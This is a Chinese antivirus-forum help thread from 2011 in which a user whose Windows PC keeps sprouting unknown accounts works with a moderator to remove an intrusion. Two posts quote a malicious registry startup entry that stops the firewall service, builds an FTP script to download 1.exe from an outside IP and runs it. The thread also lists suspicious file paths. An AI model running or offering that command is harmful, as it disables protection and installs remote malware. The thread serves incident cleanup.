被入侵，被侮辱，出现三个莫名其妙的用户 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛被入侵，被侮辱，出现三个莫名其妙的用户

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12

1 / 2 页

跳转页

[求助] 被入侵，被侮辱，出现三个莫名其妙的用户

让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:	发表于： 2011-06-09 21:19 \| 显示全部短消息资料字号：小中大 1楼被入侵，被侮辱，出现三个莫名其妙的用户多年来一直使用瑞星，感觉不错月前发现电脑出现一个莫名其妙的用户，屡删不掉，求助瑞星卡卡后问题解决本人平常一般上班即在线，下班即休眠。昨天偶尔开关机又发现新出来一个用户＊＊＊，遂在用户管理里面删除用户。今天不放心，在此开关机，发现竟然又多出现三个用户，分别是adminss、caolimal、IIS-SERVER，更可悲的是用我原来的用户登陆后进入用户管理，准备删除这三个用户，竟然是“Windows 不能打开用户帐户控制面板”，用瑞星杀毒后，未能解决。万能的瑞星，我的电脑是不是被别人控制了，救救我吧用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:	分享到：

让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:	发表于： 2011-06-09 21:20 \| 显示全部短消息资料字号：小中大 2楼回复：被入侵，被侮辱，出现三个莫名其妙的用户上次出现问题时候，我的求助： http://bbs.ikaka.com/showtopic-8982905.aspx
让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:

让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:	发表于： 2011-06-09 21:30 \| 显示全部短消息资料字号：小中大 3楼扫描的日志扫描的日志附件: 文件名:SREngLOG.rar 下载次数:278 文件类型:application/octet-stream 文件大小: 上传时间:2011-6-9 21:30:12 描述:rar
让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:

让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:	发表于： 2011-06-09 22:06 \| 显示全部短消息资料字号：小中大 4楼回复 4F oooper 的帖子东西太多，不敢格式化系统
让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:

让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:	发表于： 2011-06-09 22:07 \| 显示全部短消息资料字号：小中大 5楼回复：被入侵，被侮辱，出现三个莫名其妙的用户斑竹，救救我
让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:

让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:	发表于： 2011-06-09 22:21 \| 显示全部短消息资料字号：小中大 6楼回复：被入侵，被侮辱，出现三个莫名其妙的用户斑竹，下班了
让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:

让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:	发表于： 2011-06-10 10:09 \| 显示全部短消息资料字号：小中大 7楼回复: 被入侵，被侮辱，出现三个莫名其妙的用户引用: 原帖由 networkedition 于 2011-6-10 9:23:00 发表 c:\windows\system32\isql\c608.exe c:\windows\downlo~1\bdsrhook.dll C:\Program Files\Asar\Xafwfiwpg.jpg这个文件瑞星可以查杀。以上文件找到压缩发来。昨天晚上捣鼓一晚上，瑞星可能已经把他们干掉了，至少c608.exe我记得肯定杀掉了，刚刚查了一下没有上述文件，又扫描了一下，请大班看一下附件: 文件名:SREngLOG0110610.rar 下载次数:315 文件类型:application/octet-stream 文件大小: 上传时间:2011-6-10 10:09:07 描述:rar
让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:

让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:	发表于： 2011-06-10 11:29 \| 显示全部短消息资料字号：小中大 8楼回复 13F networkedition 的帖子 1、c:\program files\asar\xafwfiwpg.jpg 全盘检索没有找到 2、启动项目－－注册表之如下项删除： [shell] <shell><c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 125.46.68.199> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exi> 删除时候显示“无法编辑”
让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:

让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:	发表于： 2011-06-10 14:53 \| 显示全部短消息资料字号：小中大 9楼回复 15F networkedition 的帖子按指示已可以删除：启动项目－－注册表之如下项删除： [shell] <shell><c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 125.46.68.199> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exi> 但是问题仍存在，表现为：多出来3个用户，用户管理被屏蔽
让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:

让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:	发表于： 2011-06-10 15:46 \| 显示全部短消息资料字号：小中大 10楼回复: 被入侵，被侮辱，出现三个莫名其妙的用户引用: 原帖由 networkedition 于 2011-6-10 14:59:00 发表注册表查看这项：HKEY_LOCAL_MACHINE\SAM，同样需要添加权限才可以。在这里查看是否有那三个多出的用户。没有，只有这个，看不懂：
让18 拙长孩提狮帖子:44 注册: 2003-12-15 来自:

<<上一主题|下一主题>>

12

1 / 2 页

跳转页

页面顶部

Powered by Discuz!NT